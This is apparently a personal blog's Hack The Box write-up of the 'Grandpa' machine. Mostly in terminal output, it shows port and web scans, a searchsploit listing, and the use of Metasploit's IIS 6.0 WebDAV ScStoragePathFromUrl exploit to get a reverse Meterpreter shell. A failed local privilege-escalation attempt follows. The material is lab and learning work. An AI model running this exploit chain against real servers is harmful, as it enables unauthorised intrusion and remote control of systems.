6 July 2022

Pentesting Fun Stuff

following the cyber security path…

Grandpa

Starting with a port scan.

root@n0w4n:~/opt/htb/grandpa# nmap -T4 -n -sS -sV -sC -p- 10.10.10.14
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 14:09 CEST
Nmap scan report for 10.10.10.14
Host is up (0.027s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unkown
|   Server Date: Wed, 27 Jun 2018 12:11:04 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.49 seconds

root@n0w4n:~/opt/tools/dirsearch# python3 dirsearch.py -u http://10.10.10.14/ -e php,txt -x 403,404
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, txt | Threads: 10 | Wordlist size: 6344
Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-27_14-12-39.log
Target: http://10.10.10.14/
[14:12:39] Starting:
[14:12:49] 301 -  155B  - /_vti_bin  ->  http://10.10.10.14/%5Fvti%5Fbin/
[14:12:49] 200 -    2KB - /_vti_inf.html
[14:12:49] 200 -  195B  - /_vti_bin/_vti_aut/author.dll
[14:12:49] 200 -  195B  - /_vti_bin/_vti_adm/admin.dll
[14:12:49] 200 -  106B  - /_vti_bin/shtml.exe/qwertyuiop
[14:12:49] 200 -  105B  - /_vti_bin/shtml.dll/asdfghjkl
[14:12:49] 200 -   96B  - /_vti_bin/shtml.exe?_vti_rpc
[14:12:49] 200 -   96B  - /_vti_bin/shtml.dll
[14:12:49] 500 -  112B  - /_vti_pvt/
[14:12:49] 500 -  112B  - /_vti_pvt/administrator.pwd
[14:12:49] 500 -  112B  - /_vti_pvt/authors.pwd
[14:12:49] 500 -  112B  - /_vti_pvt/administrators.pwd
[14:12:49] 500 -  112B  - /_vti_pvt/shtml.exe
[14:12:49] 500 -  112B  - /_vti_pvt/service.pwd
[14:12:49] 500 -  112B  - /_vti_pvt/users.pwd
[14:13:07] 301 -  149B  - /Images  ->  http://10.10.10.14/Images/
[14:13:07] 301 -  149B  - /images  ->  http://10.10.10.14/images/
[14:13:13] 200 -    2KB - /postinfo.html
Task Completed
root@n0w4n:~/opt/htb/grandpa# nikto -h http://10.10.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2018-06-27 14:16:36 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH PROPFIND LOCK UNLOCK COPY PROPPATCH MKCOL listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 7499 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time:           2018-06-27 14:20:53 (GMT2) (257 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@n0w4n:~/opt/tools/dirsearch# searchsploit webdav
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 1.3.12 - WebDAV Directory Listings                                                                                                          | exploits/linux/remote/20210.txt
Apache JackRabbit - WebDAV XML External Entity                                                                                                     | exploits/java/webapps/37110.py
Apache Tomcat - 'WebDAV' Remote File Disclosure                                                                                                    | exploits/multiple/remote/4530.pl
Apache Tomcat - WebDAV SSL Remote File Disclosure                                                                                                  | exploits/linux/remote/4552.pl
Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities                                                                                                  | exploits/ios/webapps/27655.txt
Liferay 6.0.x - WebDAV File Reading                                                                                                                | exploits/multiple/remote/18763.txt
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow                                                                                                 | exploits/windows/remote/1.c
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)                                                                                    | exploits/windows/remote/16471.rb
Microsoft IIS - WebDAV XML Denial of Service (MS04-030)                                                                                            | exploits/windows/dos/585.pl
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)                                                                         | exploits/windows/remote/41992.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1)                                                         | exploits/windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2)                                                         | exploits/windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3)                                                         | exploits/windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4)                                                         | exploits/windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)                                                                       | exploits/windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service                                                                                                       | exploits/windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service                                                                               | exploits/windows/dos/20854.txt
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service                                                                              | exploits/windows/dos/22670.c
Microsoft IIS 5.0 - WebDAV Remote                                                                                                                  | exploits/windows/remote/2.c
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)                                                                                       | exploits/windows/remote/51.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure                                                                                     | exploits/windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                                                                           | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                                                                                        | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                                                                                        | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                                                                                      | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                                                                                    | exploits/windows/remote/8754.patch
Microsoft Windows - WebDAV Remote Code Execution (2)                                                                                               | exploits/windows/remote/36.c
Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)                                                                           | exploits/windows/local/39788.txt
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1)                                                                 | exploits/windows_x86/local/39432.c
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)                                                         | exploits/windows/local/40085.rb
Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Privilege Escalation                                                                          | exploits/windows/local/36424.txt
Neon WebDAV Client Library 0.2x - Format String                                                                                                    | exploits/linux/dos/23999.txt
Nginx 0.7.61 - WebDAV Directory Traversal                                                                                                          | exploits/multiple/remote/9829.txt
Sun Java System Web Server 6.1/7.0 - WebDAV Format String                                                                                          | exploits/multiple/dos/33560.txt
Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)                                                                           | exploits/multiple/remote/16314.rb
WebDAV - Application DLL Hijacker (Metasploit)                                                                                                     | exploits/windows/remote/16550.rb
XAMPP - WebDAV PHP Upload (Metasploit)                                                                                                             | exploits/windows/remote/18367.rb
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Shellcode Title                                                                                                                                   |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)                                                     | shellcodes/windows_x86/39519.c
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Ok…..did some enumeration and it looks like there is a vulnerability in webDAV which can be exploited through metasploit.

msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                           yes       The target address
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.14
rhost => 10.10.10.14
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.14.2:4444
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > [*] Sending stage (179779 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.14:1142) at 2018-06-27 14:31:41 +0200
meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2212 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
meterpreter > dir
Listing: c:\Documents and Settings
==================================
Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 16:12:15 +0200  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 16:03:34 +0200  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 16:04:48 +0200  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 16:32:01 +0200  Harry
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:32 +0200  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:31 +0200  NetworkService
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 39 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

There are a few suggested possibilities. The box acts a bit unstable and with getting the previous session it took some tries. Eventually I got a meterpreter session.

msf exploit(windows/local/ms14_070_tcpip_ioctl) > [*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] 10.10.10.14 - Meterpreter session 1 closed. Reason: Died

And for the 6th time in a row the process hangs.What is wrong with this machine?

root@n0w4n:~/opt/htb/grandpa# nmap -n -T4 -sS 10.10.10.14
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 21:22 CEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.14 seconds

Looks like the machine is down. Because I already did reset this machines twice I think that this machine is a bit off. Maybe I will look at it some other time, but for now I give it a rest and start a new machine.
 

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.